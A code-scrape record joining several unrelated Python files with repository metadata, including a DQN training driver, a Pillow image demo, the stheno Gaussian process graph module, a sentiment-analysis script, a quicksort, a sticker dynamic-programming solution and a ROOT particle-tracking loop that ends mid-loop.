# Offline training driver: replays stored experiences through the model
# network and then the DQN head, printing the loss at each step.
model = Model()
experiences = Experiences()
print('experiences ', len(experiences.get()[0]))
for _ in range(10):
    model_loss = model.model_train(experiences, False)
    print('model', model_loss)
model.save()
for _ in range(10):
    dqn_loss = model.dqn_train(experiences, False)
    print('dqn', dqn_loss)
model.save() | uberthought/DQN | offline_train.py | offline_train.py | py | 435 | python | en | code | 0 | github-code | 36 |
18306688211 | from PIL import Image
# Basic Pillow demo: inspect a photo, then save a grayscale copy and a
# rotated copy alongside it.
# NOTE(review): paths are hard-coded to one machine; parameterise before reuse.
img = Image.open(r"C:\Users\rohan\Downloads\Pictures\IMG_5093.jpg")
height = img.height
width = img.width
print(f"Height:{height} Width:{width}")
r, g, b = img.getpixel((100, 100))
print(f"R:{r} G:{g} B:{b}")
# Grayscale copy ("L" = 8-bit luminance).
img2 = img.convert("L")
img2.show()
# BUG FIX: Image.save() returns None; the original rebound img2/img3 to
# the save() result, discarding the image objects.
img2.save(r"C:\Users\rohan\Downloads\Pictures\test2.jpeg")
# Upside-down copy.
img3 = img.rotate(180)
img3.show()
img3.save(r"C:\Users\rohan\Downloads\Pictures\test3.jpeg")
| rohanxd1/Codes | Python/TEST.py | TEST.py | py | 416 | python | en | code | 0 | github-code | 36 |
11519320722 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
import logging
from types import FunctionType
from fdm import central_fdm
from lab import B
from plum import Dispatcher, Self, Referentiable, type_parameter, Union
from .util import uprank
from .input import Input, At, MultiInput
from .kernel import ZeroKernel, PosteriorKernel, TensorProductKernel, \
CorrectiveKernel, OneKernel
from .lazy import LazyVector, LazyMatrix
from .matrix import matrix, Diagonal, dense
from .mean import PosteriorMean, ZeroMean, OneMean
from .mokernel import MultiOutputKernel as MOK
from .momean import MultiOutputMean as MOM
from .random import Random, PromisedGP, RandomProcess, Normal
__all__ = ['GP',
'model',
'Graph',
'AbstractObservations',
'Observations', 'Obs',
'SparseObservations', 'SparseObs']
log = logging.getLogger(__name__)
def ensure_at(x, ref=None):
    """Ensure that an input location is typed with `At` to specify which
    process it belongs to.

    Args:
        x (input): Input location.
        ref (:class:`.graph.GP`, optional): Reference process. If provided and
            `x` is not an instance of `At`, then it is assumed to belong to
            `ref`.

    Returns:
        :class:`.input.At`: Input, instance of `At`.
    """
    # Already tagged with a process: pass through unchanged.
    if isinstance(x, At):
        return x
    # No reference to fall back on: the caller must disambiguate.
    if ref is None:
        raise ValueError('Must explicitly specify the processes which to '
                         'condition on.')
    return ref(x)
class AbstractObservations(Referentiable):
    """Abstract base class for observations.

    Concrete subclasses implement `posterior_kernel` and `posterior_mean`,
    which :meth:`.graph.Graph.condition` uses to build conditioned
    processes.
    """
    _dispatch = Dispatcher(in_class=Self)
    @_dispatch({B.Numeric, Input}, B.Numeric, [PromisedGP])
    def __init__(self, x, y, ref=None):
        # Single (x, y) pair: tag `x` with its process (via `ref` if it is
        # not already an `At` instance).
        self._ref = ref
        self.x = ensure_at(x, self._ref)
        self.y = y
        self.graph = type_parameter(self.x).graph
    @_dispatch([Union(tuple, list, PromisedGP)])
    def __init__(self, *pairs, **kw_args):
        # Multiple (x, y) pairs: stack them into a single observation on a
        # vector-valued (multi-output) process.
        # Check whether there's a reference.
        self._ref = kw_args['ref'] if 'ref' in kw_args else None
        # Ensure `At` for all pairs.
        pairs = [(ensure_at(x, self._ref), y) for x, y in pairs]
        # Get the graph from the first pair.
        self.graph = type_parameter(pairs[0][0]).graph
        # Extend the graph by the Cartesian product `p` of all processes.
        p = self.graph.cross(*self.graph.ps)
        # Condition on the newly created vector-valued GP.
        xs, ys = zip(*pairs)
        self.x = p(MultiInput(*xs))
        self.y = B.concat(*[uprank(y) for y in ys], axis=0)
    @_dispatch({tuple, list})
    def __ror__(self, ps):
        # Supports `(p1, p2, ...) | obs` to condition several processes at
        # once; returns the corresponding posterior processes.
        return self.graph.condition(ps, self)
    def posterior_kernel(self, p_i, p_j):  # pragma: no cover
        """Get the posterior kernel between two processes.

        Args:
            p_i (:class:`.graph.GP`): First process.
            p_j (:class:`.graph.GP`): Second process.

        Returns:
            :class:`.kernel.Kernel`: Posterior kernel between the first and
                second process.
        """
        raise NotImplementedError('Posterior kernel construction not '
                                  'implemented.')
    def posterior_mean(self, p):  # pragma: no cover
        """Get the posterior kernel of a process.

        Args:
            p (:class:`.graph.GP`): Process.

        Returns:
            :class:`.mean.Mean`: Posterior mean of `p`.
        """
        raise NotImplementedError('Posterior mean construction not '
                                  'implemented.')
class Observations(AbstractObservations, Referentiable):
    """Exact (dense) observations.

    Can alternatively construct an instance of `Observations` with tuples or
    lists of valid constructors.

    Args:
        x (input): Locations of points to condition on.
        y (tensor): Observations to condition on.
        ref (:class:`.class.GP`, optional): Reference process. See
            :func:`.graph.ensure_at`.
    """
    _dispatch = Dispatcher(in_class=Self)
    def __init__(self, *args, **kw_args):
        AbstractObservations.__init__(self, *args, **kw_args)
        # Lazily computed and cached kernel matrix of the data.
        self._K_x = None
    @property
    def K_x(self):
        """Kernel matrix of the data."""
        if self._K_x is None: # Cache computation.
            p_x, x = type_parameter(self.x), self.x.get()
            self._K_x = matrix(self.graph.kernels[p_x](x))
        return self._K_x
    def posterior_kernel(self, p_i, p_j):
        # Standard GP posterior cross-kernel, built from the prior
        # cross-kernels with the data process and the cached K_x.
        p_x, x = type_parameter(self.x), self.x.get()
        return PosteriorKernel(self.graph.kernels[p_i, p_j],
                               self.graph.kernels[p_x, p_i],
                               self.graph.kernels[p_x, p_j],
                               x, self.K_x)
    def posterior_mean(self, p):
        # Standard GP posterior mean of `p` given the observed `y`.
        p_x, x = type_parameter(self.x), self.x.get()
        return PosteriorMean(self.graph.means[p],
                             self.graph.means[p_x],
                             self.graph.kernels[p_x, p],
                             x, self.K_x, self.y)
class SparseObservations(AbstractObservations, Referentiable):
    """Observations through inducing points. Takes further arguments
    according to the constructor of :class:`.graph.Observations`.

    This is a variational sparse approximation: the data at `x` (with
    additive noise process `e`) is summarised through inducing points `z`,
    and `elbo` gives the evidence lower bound of the approximation.

    Attributes:
        elbo (scalar): ELBO.

    Args:
        z (input): Locations of the inducing points.
        e (:class:`.graph.GP`): Additive, independent noise process.
    """
    _dispatch = Dispatcher(in_class=Self)
    @_dispatch({B.Numeric, Input, tuple, list},
               [Union(tuple, list, PromisedGP)])
    def __init__(self, z, *pairs, **kw_args):
        # Multiple (e, x, y) triples: stack the data via the base class,
        # cross the noise processes, then defer to the base constructor.
        es, xs, ys = zip(*pairs)
        AbstractObservations.__init__(self, *zip(xs, ys), **kw_args)
        SparseObservations.__init__(self,
                                    z,
                                    self.graph.cross(*es),
                                    self.x,
                                    self.y,
                                    **kw_args)
    @_dispatch({list, tuple},
               PromisedGP,
               {B.Numeric, Input},
               B.Numeric,
               [PromisedGP])
    def __init__(self, zs, e, x, y, ref=None):
        # Multiple sets of inducing points: bundle them into one
        # multi-input on the Cartesian product of their processes.
        # Ensure `At` everywhere.
        zs = [ensure_at(z, ref=ref) for z in zs]
        # Extract graph.
        graph = type_parameter(zs[0]).graph
        # Create a representative multi-output process.
        p_z = graph.cross(*(type_parameter(z) for z in zs))
        SparseObservations.__init__(self,
                                    p_z(MultiInput(*zs)),
                                    e, x, y, ref=ref)
    @_dispatch({B.Numeric, Input},
               PromisedGP,
               {B.Numeric, Input},
               B.Numeric,
               [PromisedGP])
    def __init__(self, z, e, x, y, ref=None):
        # Base case: a single set of inducing points `z` and one noise
        # process `e`. All derived quantities are computed lazily.
        AbstractObservations.__init__(self, x, y, ref=ref)
        self.z = ensure_at(z, self._ref)
        self.e = e
        self._K_z = None
        self._elbo = None
        self._mu = None
        self._A = None
    @property
    def K_z(self):
        """Kernel matrix of the inducing points."""
        if self._K_z is None: # Cache computation.
            self._compute()
        return self._K_z
    @property
    def elbo(self):
        """ELBO."""
        if self._elbo is None: # Cache computation.
            self._compute()
        return self._elbo
    @property
    def mu(self):
        """Mean of optimal approximating distribution."""
        if self._mu is None: # Cache computation.
            self._compute()
        return self._mu
    @property
    def A(self):
        """Parameter of the corrective variance of the kernel of the optimal
        approximating distribution."""
        if self._A is None: # Cache computation.
            self._compute()
        return self._A
    def _compute(self):
        # Compute and cache K_z, A, mu, and the ELBO in one pass.
        # Extract processes.
        p_x, x = type_parameter(self.x), self.x.get()
        p_z, z = type_parameter(self.z), self.z.get()
        # Construct the necessary kernel matrices.
        K_zx = self.graph.kernels[p_z, p_x](z, x)
        self._K_z = matrix(self.graph.kernels[p_z](z))
        # Evaluating `e.kernel(x)` will yield incorrect results if `x` is a
        # `MultiInput`, because `x` then still designates the particular
        # components of `f`. Fix that by instead designating the elements of
        # `e`.
        if isinstance(x, MultiInput):
            x_n = MultiInput(*(p(xi.get())
                               for p, xi in zip(self.e.kernel.ps, x.get())))
        else:
            x_n = x
        # Construct the noise kernel matrix.
        K_n = self.e.kernel(x_n)
        # The approximation can only handle diagonal noise matrices.
        if not isinstance(K_n, Diagonal):
            raise RuntimeError('Kernel matrix of noise must be diagonal.')
        # And construct the components for the inducing point approximation.
        L_z = B.cholesky(self._K_z)
        self._A = B.eye(self._K_z) + \
                  B.qf(K_n, B.transpose(B.trisolve(L_z, K_zx)))
        y_bar = uprank(self.y) - self.e.mean(x_n) - self.graph.means[p_x](x)
        prod_y_bar = B.trisolve(L_z, B.qf(K_n, B.transpose(K_zx), y_bar))
        # Compute the optimal mean.
        self._mu = self.graph.means[p_z](z) + \
                   B.qf(self._A, B.trisolve(L_z, self._K_z), prod_y_bar)
        # Compute the ELBO.
        # NOTE: The calculation of `trace_part` asserts that `K_n` is diagonal.
        # The rest, however, is completely generic.
        trace_part = B.ratio(Diagonal(self.graph.kernels[p_x].elwise(x)[:, 0]) -
                             Diagonal(B.qf_diag(self._K_z, K_zx)), K_n)
        det_part = B.logdet(2 * B.pi * K_n) + B.logdet(self._A)
        qf_part = B.qf(K_n, y_bar)[0, 0] - B.qf(self._A, prod_y_bar)[0, 0]
        self._elbo = -0.5 * (trace_part + det_part + qf_part)
    def posterior_kernel(self, p_i, p_j):
        # Posterior kernel through the inducing points plus a corrective
        # term accounting for the approximate (not exact) posterior.
        p_z, z = type_parameter(self.z), self.z.get()
        return PosteriorKernel(self.graph.kernels[p_i, p_j],
                               self.graph.kernels[p_z, p_i],
                               self.graph.kernels[p_z, p_j],
                               z, self.K_z) + \
               CorrectiveKernel(self.graph.kernels[p_z, p_i],
                                self.graph.kernels[p_z, p_j],
                                z, self.A, self.K_z)
    def posterior_mean(self, p):
        # Posterior mean of `p` given the optimal approximate mean `mu` at
        # the inducing points.
        p_z, z = type_parameter(self.z), self.z.get()
        return PosteriorMean(self.graph.means[p],
                             self.graph.means[p_z],
                             self.graph.kernels[p_z, p],
                             z, self.K_z, self.mu)
Obs = Observations #: Shorthand for `Observations`.
SparseObs = SparseObservations #: Shorthand for `SparseObservations`.
class Graph(Referentiable):
    """A GP model: a collection of processes with their means and
    (cross-)kernels, stored lazily so that derived processes can be added
    cheaply."""
    _dispatch = Dispatcher(in_class=Self)
    def __init__(self):
        self.ps = []          # all processes on this graph, in creation order
        self.pids = set()     # ids of those processes, for lazy-rule guards
        self.kernels = LazyMatrix()  # (cross-)kernels between processes
        self.means = LazyVector()    # means of processes
        # Store named GPs in both ways.
        self.gps_by_name = {}
        self.names_by_gp = {}
    @_dispatch(str)
    def __getitem__(self, name):
        # Look a GP up by its name.
        return self.gps_by_name[name]
    @_dispatch(PromisedGP)
    def __getitem__(self, p):
        # Look a GP's name up by the GP itself.
        return self.names_by_gp[id(p)]
    @_dispatch(PromisedGP, str)
    def name(self, p, name):
        """Name a GP.

        Args:
            p (:class:`.graph.GP`): GP to name.
            name (str): Name. Must be unique.
        """
        # Delete any existing names and back-references for the GP.
        if id(p) in self.names_by_gp:
            del self.gps_by_name[self.names_by_gp[id(p)]]
            del self.names_by_gp[id(p)]
        # Check that name is not in use.
        if name in self.gps_by_name:
            raise RuntimeError('Name "{}" for "{}" already taken by "{}".'
                               ''.format(name, p, self[name]))
        # Set the name and the back-reference.
        self.gps_by_name[name] = p
        self.names_by_gp[id(p)] = name
    def _add_p(self, p):
        # Register a process with the graph.
        self.ps.append(p)
        self.pids.add(id(p))
    def _update(self, mean, k_ii_generator, k_ij_generator):
        # Create a new GP on this graph with the given mean and kernel
        # generators, wiring up cross-kernels with all existing processes.
        p = GP(self)
        self.means[p] = mean
        self.kernels.add_rule((p, p), self.pids, k_ii_generator)
        self.kernels.add_rule((p, None), self.pids, k_ij_generator)
        self.kernels.add_rule((None, p), self.pids,
                              lambda pi: reversed(self.kernels[p, pi]))
        self._add_p(p)
        return p
    def add_independent_gp(self, p, kernel, mean):
        """Add an independent GP to the model.

        Args:
            p (:class:`.graph.GP`): GP object to add.
            kernel (:class:`.kernel.Kernel`): Kernel function of GP.
            mean (:class:`.mean.Mean`): Mean function of GP.

        Returns:
            :class:`.graph.GP`: The newly added independent GP.
        """
        # Update means.
        self.means[p] = mean
        # Add rule to kernels. Cross-kernels with every other process are
        # zero, since the GP is independent.
        self.kernels[p] = kernel
        self.kernels.add_rule((p, None), self.pids, lambda pi: ZeroKernel())
        self.kernels.add_rule((None, p), self.pids, lambda pi: ZeroKernel())
        self._add_p(p)
        return p
    @_dispatch(object, PromisedGP)
    def sum(self, other, p):
        """Sum a GP from the graph with another object.

        Args:
            obj1 (other type or :class:`.graph.GP`): First term in the sum.
            obj2 (other type or :class:`.graph.GP`): Second term in the sum.

        Returns:
            :class:`.graph.GP`: The GP corresponding to the sum.
        """
        return self.sum(p, other)
    @_dispatch(PromisedGP, object)
    def sum(self, p, other):
        # GP plus a constant/function: shifts the mean; kernels unchanged.
        return self._update(self.means[p] + other,
                            lambda: self.kernels[p],
                            lambda pi: self.kernels[p, pi])
    @_dispatch(PromisedGP, PromisedGP)
    def sum(self, p1, p2):
        # Check that the GPs are on the same graph.
        if p1.graph != p2.graph:
            raise RuntimeError('Can only add GPs from the same graph.')
        return self._update(self.means[p1] + self.means[p2],
                            (lambda: self.kernels[p1] +
                                     self.kernels[p2] +
                                     self.kernels[p1, p2] +
                                     self.kernels[p2, p1]),
                            lambda pi: self.kernels[p1, pi] +
                                       self.kernels[p2, pi])
    @_dispatch(PromisedGP, B.Numeric)
    def mul(self, p, other):
        """Multiply a GP from the graph with another object.

        Args:
            p (:class:`.graph.GP`): GP in the product.
            other (object): Other object in the product.

        Returns:
            :class:`.graph.GP`: The GP corresponding to the product.
        """
        # Scaling by a constant scales the mean linearly and the kernel
        # quadratically.
        return self._update(self.means[p] * other,
                            lambda: self.kernels[p] * other ** 2,
                            lambda pi: self.kernels[p, pi] * other)
    @_dispatch(PromisedGP, FunctionType)
    def mul(self, p, f):
        # Multiplication by a deterministic function of the input.
        def ones(x):
            return B.ones(B.dtype(x), B.shape(x)[0], 1)
        return self._update(f * self.means[p],
                            lambda: f * self.kernels[p],
                            (lambda pi: TensorProductKernel(f, ones) *
                                        self.kernels[p, pi]))
    def shift(self, p, shift):
        """Shift a GP.

        Args:
            p (:class:`.graph.GP`): GP to shift.
            shift (object): Amount to shift by.

        Returns:
            :class:`.graph.GP`: The shifted GP.
        """
        return self._update(self.means[p].shift(shift),
                            lambda: self.kernels[p].shift(shift),
                            lambda pi: self.kernels[p, pi].shift(shift, 0))
    def stretch(self, p, stretch):
        """Stretch a GP.

        Args:
            p (:class:`.graph.GP`): GP to stretch.
            stretch (object): Extent of stretch.

        Returns:
            :class:`.graph.GP`: The stretched GP.
        """
        return self._update(self.means[p].stretch(stretch),
                            lambda: self.kernels[p].stretch(stretch),
                            lambda pi: self.kernels[p, pi].stretch(stretch, 1))
    def select(self, p, *dims):
        """Select input dimensions.

        Args:
            p (:class:`.graph.GP`): GP to select input
                dimensions from.
            *dims (object): Dimensions to select.

        Returns:
            :class:`.graph.GP`: GP with the specific input dimensions.
        """
        return self._update(self.means[p].select(dims),
                            lambda: self.kernels[p].select(dims),
                            lambda pi: self.kernels[p, pi].select(dims, None))
    def transform(self, p, f):
        """Transform the inputs of a GP.

        Args:
            p (:class:`.graph.GP`): GP to input transform.
            f (function): Input transform.

        Returns:
            :class:`.graph.GP`: Input-transformed GP.
        """
        return self._update(self.means[p].transform(f),
                            lambda: self.kernels[p].transform(f),
                            lambda pi: self.kernels[p, pi].transform(f, None))
    def diff(self, p, dim=0):
        """Differentiate a GP.

        Args:
            p (:class:`.graph.GP`): GP to differentiate.
            dim (int, optional): Dimension of feature which to take the
                derivative with respect to. Defaults to `0`.

        Returns:
            :class:`.graph.GP`: Derivative of GP.
        """
        return self._update(self.means[p].diff(dim),
                            lambda: self.kernels[p].diff(dim),
                            lambda pi: self.kernels[p, pi].diff(dim, None))
    @_dispatch({list, tuple}, AbstractObservations)
    def condition(self, ps, obs):
        """Condition the graph on observations.

        Args:
            ps (list[:class:`.graph.GP`]): Processes to condition.
            obs (:class:`.graph.AbstractObservations`): Observations to
                condition on.

        Returns:
            list[:class:`.graph.GP`]: Posterior processes.
        """
        # A construction like this is necessary to properly close over `p`.
        def build_gens(p):
            def k_ij_generator(pi):
                return obs.posterior_kernel(p, pi)
            def k_ii_generator():
                return obs.posterior_kernel(p, p)
            return k_ii_generator, k_ij_generator
        return [self._update(obs.posterior_mean(p), *build_gens(p)) for p in ps]
    def cross(self, *ps):
        """Construct the Cartesian product of a collection of processes.

        Args:
            *ps (:class:`.graph.GP`): Processes to construct the
                Cartesian product of.

        Returns:
            :class:`.graph.GP`: The Cartesian product of `ps`.
        """
        mok = MOK(*ps)
        return self._update(MOM(*ps),
                            lambda: mok,
                            lambda pi: mok.transform(None, lambda y: At(pi)(y)))
    @_dispatch(int, [At])
    def sample(self, n, *xs):
        """Sample multiple processes simultaneously.

        Args:
            n (int, optional): Number of samples. Defaults to `1`.
            *xs (:class:`.graph.At`): Locations to sample at.

        Returns:
            tuple: Tuple of samples.
        """
        # Sample jointly from a multi-output GP on a fresh graph, then
        # split the stacked sample back per input.
        sample = GP(MOK(*self.ps),
                    MOM(*self.ps),
                    graph=Graph())(MultiInput(*xs)).sample(n)
        # To unpack `x`, just keep `.get()`ing.
        def unpack(x):
            while isinstance(x, Input):
                x = x.get()
            return x
        # Unpack sample.
        lengths = [B.shape(uprank(unpack(x)))[0] for x in xs]
        i, samples = 0, []
        for length in lengths:
            samples.append(sample[i:i + length, :])
            i += length
        return samples[0] if len(samples) == 1 else samples
    @_dispatch([At])
    def sample(self, *xs):
        # Default to a single sample.
        return self.sample(1, *xs)
    @_dispatch([{list, tuple}])
    def logpdf(self, *pairs):
        # Joint log-pdf of several (x, y) pairs.
        xs, ys = zip(*pairs)
        # Check that all processes are specified.
        if not all([isinstance(x, At) for x in xs]):
            raise ValueError('Must explicitly specify the processes which to '
                             'compute the log-pdf for.')
        # Uprank all outputs and concatenate.
        y = B.concat(*[uprank(y) for y in ys], axis=0)
        # Return composite log-pdf.
        return GP(MOK(*self.ps),
                  MOM(*self.ps),
                  graph=Graph())(MultiInput(*xs)).logpdf(y)
    @_dispatch(At, B.Numeric)
    def logpdf(self, x, y):
        # Log-pdf of a single typed input under its process.
        return x.logpdf(y)
    @_dispatch(Observations)
    def logpdf(self, obs):
        # Exact observations: exact log-marginal likelihood.
        return obs.x.logpdf(obs.y)
    @_dispatch(SparseObservations)
    def logpdf(self, obs):
        # Sparse observations: the ELBO is the (lower-bound) "log-pdf".
        return obs.elbo
model = Graph() #: A default graph provided for convenience
class GP(RandomProcess, Referentiable):
"""Gaussian process.
Args:
kernel (:class:`.kernel.Kernel`): Kernel of the
process.
mean (:class:`.mean.Mean`, optional): Mean function of the
process. Defaults to zero.
graph (:class:`.graph.Graph`, optional): Graph to attach to.
"""
_dispatch = Dispatcher(in_class=Self)
@_dispatch([object])
def __init__(self, kernel, mean=None, graph=model, name=None):
# Resolve kernel.
if isinstance(kernel, (B.Numeric, FunctionType)):
kernel = kernel * OneKernel()
# Resolve mean.
if mean is None:
mean = ZeroMean()
elif isinstance(mean, (B.Numeric, FunctionType)):
mean = mean * OneMean()
# Then add a new `GP` to the graph with the resolved kernel and mean.
self.graph = graph
self.graph.add_independent_gp(self, kernel, mean)
# If a name is given, set the name.
if name:
self.graph.name(self, name)
@_dispatch(Graph)
def __init__(self, graph):
self.graph = graph
@property
def kernel(self):
"""Kernel of the GP."""
return self.graph.kernels[self]
@property
def mean(self):
"""Mean function of the GP."""
return self.graph.means[self]
@property
def name(self):
"""Name of the GP."""
return self.graph[self]
@name.setter
@_dispatch(str)
def name(self, name):
self.graph.name(self, name)
def __call__(self, x):
"""Construct a finite-dimensional distribution at specified locations.
Args:
x (input): Points to construct the distribution at.
Returns:
:class:`.random.Normal`: Finite-dimensional distribution.
"""
return Normal(self, x)
@_dispatch([object])
def condition(self, *args):
"""Condition the GP. See :meth:`.graph.Graph.condition`."""
return self.graph.condition((self,), Observations(*args, ref=self))[0]
@_dispatch(AbstractObservations)
def condition(self, obs):
return self.graph.condition((self,), obs)[0]
@_dispatch(object)
def __add__(self, other):
return self.graph.sum(self, other)
@_dispatch(Random)
def __add__(self, other):
raise NotImplementedError('Cannot add a GP and a {}.'
''.format(type(other).__name__))
@_dispatch(Self)
def __add__(self, other):
return self.graph.sum(self, other)
@_dispatch(object)
def __mul__(self, other):
return self.graph.mul(self, other)
@_dispatch(Random)
def __mul__(self, other):
raise NotImplementedError('Cannot multiply a GP and a {}.'
''.format(type(other).__name__))
@_dispatch(Self)
def __mul__(self, other):
return (lambda x: self.graph.means[self](x)) * other + \
self * (lambda x: self.graph.means[other](x)) + \
GP(kernel=self.graph.kernels[self] *
self.graph.kernels[other] +
self.graph.kernels[self, other] *
self.graph.kernels[other, self],
mean=-self.graph.means[self] *
self.graph.means[other],
graph=self.graph)
@_dispatch([object])
def __or__(self, args):
"""Shorthand for conditioning."""
return self.condition(Observations(*args, ref=self))
@_dispatch(AbstractObservations)
def __or__(self, obs):
return self.condition(obs)
def shift(self, shift):
"""Shift the GP. See :meth:`.graph.Graph.shift`."""
return self.graph.shift(self, shift)
def stretch(self, stretch):
"""Stretch the GP. See :meth:`.graph.Graph.stretch`."""
return self.graph.stretch(self, stretch)
def __gt__(self, stretch):
"""Shorthand for :meth:`.graph.GP.stretch`."""
return self.stretch(stretch)
def transform(self, f):
"""Input transform the GP. See :meth:`.graph.Graph.transform`."""
return self.graph.transform(self, f)
def select(self, *dims):
"""Select dimensions from the input. See :meth:`.graph.Graph.select`."""
return self.graph.select(self, *dims)
def __getitem__(self, *dims):
"""Shorthand for :meth:`.graph.GP.select`."""
return self.select(*dims)
def diff(self, dim=0):
"""Differentiate the GP. See :meth:`.graph.Graph.diff`."""
return self.graph.diff(self, dim)
def diff_approx(self, deriv=1, order=6):
"""Approximate the derivative of the GP by constructing a finite
difference approximation.
Args:
deriv (int): Order of the derivative.
order (int): Order of the estimate.
Returns:
Approximation of the derivative of the GP.
"""
# Use the FDM library to figure out the coefficients.
fdm = central_fdm(order, deriv, adapt=0, factor=1e8)
fdm.estimate() # Estimate step size.
# Construct finite difference.
df = 0
for g, c in zip(fdm.grid, fdm.coefs):
df += c * self.shift(-g * fdm.step)
return df / fdm.step ** deriv
    @property
    def stationary(self):
        """Stationarity of the GP (delegated to its kernel)."""
        return self.kernel.stationary

    @property
    def var(self):
        """Variance of the GP (delegated to its kernel)."""
        return self.kernel.var

    @property
    def length_scale(self):
        """Length scale of the GP (delegated to its kernel)."""
        return self.kernel.length_scale

    @property
    def period(self):
        """Period of the GP (delegated to its kernel)."""
        return self.kernel.period
    def __str__(self):
        # Both string forms use the default formatter of display().
        return self.display()

    def __repr__(self):
        return self.display()
def display(self, formatter=lambda x: x):
"""Display the GP.
Args:
formatter (function, optional): Function to format values.
Returns:
str: GP as a string.
"""
return 'GP({}, {})'.format(self.kernel.display(formatter),
self.mean.display(formatter))
# Resolve the forward reference: placeholders created through `PromisedGP`
# before this class existed now delegate to the real `GP` class.
PromisedGP.deliver(GP)
| pb593/stheno | stheno/graph.py | graph.py | py | 27,441 | python | en | code | null | github-code | 36 |
70231595624 | '''
Name: Main file for HW2 of FE 595
Intro: This file should load the cleaned data from theyfightcrime.org, sort the data, and return the required info.
Author: William Long
Date : 09/22/2019
'''
import pandas as pd
import numpy as np
from textblob import TextBlob
import nltk
# First, load the cleaned data: one character description per line.
m_raw = pd.read_csv('Male_full.txt', names=["male"], sep='\t')
f_raw = pd.read_csv('Female_full.txt', names=["female"], sep='\t')
# We need to get the sentiment.
def char_sent(text: str) -> float:
    '''
    This function takes in some text and returns its sentiment polarity
    using TextBlob.
    :param text: String to score.
    :return: sent, float polarity (TextBlob reports values in [-1.0, 1.0])
    '''
    sent = TextBlob(text).sentiment.polarity
    return sent
# Score every description with a sentiment polarity column.
m_raw["sentiment"] = m_raw.apply(lambda row: char_sent(row["male"]), axis=1)
f_raw["sentiment"] = f_raw.apply(lambda row: char_sent(row["female"]), axis=1)

# Sort ascending by sentiment: head() = most negative, tail() = most positive.
m_sort = m_raw.sort_values(by=["sentiment"])
f_sort = f_raw.sort_values(by=["sentiment"])
m_best = m_sort.tail(10)
f_best = f_sort.tail(10)
m_worst = m_sort.head(10)
f_worst = f_sort.head(10)


def _adjectives(texts):
    """Return every adjective (POS tag 'JJ') found across an iterable of texts.

    Replaces two duplicated index-based loops with one helper that iterates
    the values directly.
    """
    found = []
    for text in texts:
        tags = nltk.pos_tag(nltk.word_tokenize(text))
        found.extend(word for word, tag in tags if tag == 'JJ')
    return found


# Collect the descriptors (adjectives) from both data sets, male then female,
# preserving the original accumulation order.
des = _adjectives(m_raw["male"]) + _adjectives(f_raw["female"])

# Rank the ten most frequent descriptors.
word_dist = nltk.FreqDist(des)
top_words = word_dist.most_common(10)
top_words_df = pd.DataFrame(top_words, columns=["Word", "Count"])

# Save the data.
m_best.to_csv(r'Male_Best.csv', index=None, header=True, sep=';')
f_best.to_csv(r'Female_Best.csv', index=None, header=True, sep=';')
m_worst.to_csv(r'Male_Worst.csv', index=None, header=True, sep=';')
f_worst.to_csv(r'Female_Worst.csv', index=None, header=True, sep=';')
top_words_df.to_csv(r'Top_Words.csv', sep=';', index=None, header=True)
| bluefinch83/FE_595_HW2 | Main.py | Main.py | py | 2,099 | python | en | code | 0 | github-code | 36 |
def main():
    # Demo entry point: sort a fixed sample list and print the result.
    print("Result-> "+str(quicksort([2, 7, 9, 3, 1, 6, 5, 4])))
def quicksort(arr):
    """Sort ``arr`` in place with Lomuto-style quicksort and return it.

    The last element is the pivot; elements smaller than the pivot are moved
    left of a growing boundary ("wall"), the pivot is then placed on the
    boundary, and both partitions are sorted recursively.  Uses idiomatic
    tuple swaps and ``enumerate`` instead of index loops and a swap helper.
    """
    pivot = arr[-1]
    wall = 0
    for i, value in enumerate(arr):
        if value < pivot:
            arr[wall], arr[i] = arr[i], arr[wall]
            wall += 1
    # Switch the pivot with the first element on the right side of the wall
    # (unless it already sits there).
    if wall < len(arr) - 1:
        arr[wall], arr[-1] = arr[-1], arr[wall]
        wall += 1
    # Guard against recursing on empty/singleton partitions (recursion hell).
    if wall > 1:
        arr[:wall] = quicksort(arr[:wall])
    if len(arr) - wall > 1:
        arr[wall:] = quicksort(arr[wall:])
    return arr
def swap_elements(arr, wall, i):
    """Swap ``arr[wall]`` and ``arr[i]`` in place (idiomatic tuple swap
    instead of a manual buffer variable)."""
    arr[wall], arr[i] = arr[i], arr[wall]
# Run the demo only when executed as a script.
if __name__ == "__main__":
    main()
4394037963 | # 스티커 모으기(2)
# r1 x
# https://programmers.co.kr/learn/courses/30/lessons/12971
# https://inspirit941.tistory.com/158
def solution(sticker):
    """Maximum sum of non-adjacent stickers arranged in a circle.

    Because the first and last stickers are adjacent on the circle, solve
    two linear versions and take the better result:
      * case A: the last sticker is excluded (the first may be used),
      * case B: the first sticker is excluded (the last may be used).
    """
    n = len(sticker)
    if n == 1:
        return sticker[0]

    # Case A: dp over indices 0 .. n-2.
    case_a = [0] * n
    case_a[0] = sticker[0]
    case_a[1] = case_a[0]
    for idx in range(2, n - 1):
        case_a[idx] = max(case_a[idx - 1], case_a[idx - 2] + sticker[idx])

    # Case B: dp over indices 1 .. n-1.
    case_b = [0] * n
    case_b[1] = sticker[1]
    for idx in range(2, n):
        case_b[idx] = max(case_b[idx - 1], case_b[idx - 2] + sticker[idx])

    return max(max(case_a), max(case_b))
23188615876 | import visualization
import ROOT as root
from detector import Detector
# Open the ROOT tracking output and grab the analysis tree.
tracking_file_name = "../../build/output/pgun/klong/stat0.root"
tracking_file = root.TFile.Open(tracking_file_name)
tree = tracking_file.Get("integral_tree")

# Vertical extents of the two veto layers (units per detector geometry —
# presumably mm; confirm against Detector).
LAYERS_Y=[[6001.0, 6004.0], [6104.0, 6107.0]]

det = Detector()

# Tallies for the (currently disabled) layer-efficiency study below.
count = [0. for i in range(6)]
total = [0. for i in range(6)]

for event_number in range(int(tree.GetEntries())):
    tree.GetEntry(event_number)
    #we can add some cuts here if we would like
    if (tree.NumTracks < 2):
        continue
    if tree.NumVertices < 1:
        continue
    # Veto events with any digi hit in layer 0 or 1.
    veto = False
    for hit_y in tree.Digi_y:
        layer = det.inLayer(hit_y)
        if layer == 1 or layer == 0:
            veto = True
            continue
    if veto:
        continue
    # nlayers = det.nLayersWHit(tree.Hit_y)
    # if nlayers < 2:
    #     continue
    # total[nlayers-2] += 1.
    # if (tree.NumTracks >0 ):
    #     count[nlayers-2] += 1.
    # continue
    # Build and save an event display: digi hits plus reconstructed tracks.
    event_display = visualization.Display()
    for k in range(int(len(tree.Digi_x))):
        event_display.AddPoint( [tree.Digi_x[k], tree.Digi_y[k], tree.Digi_z[k], tree.Digi_energy[k]] )
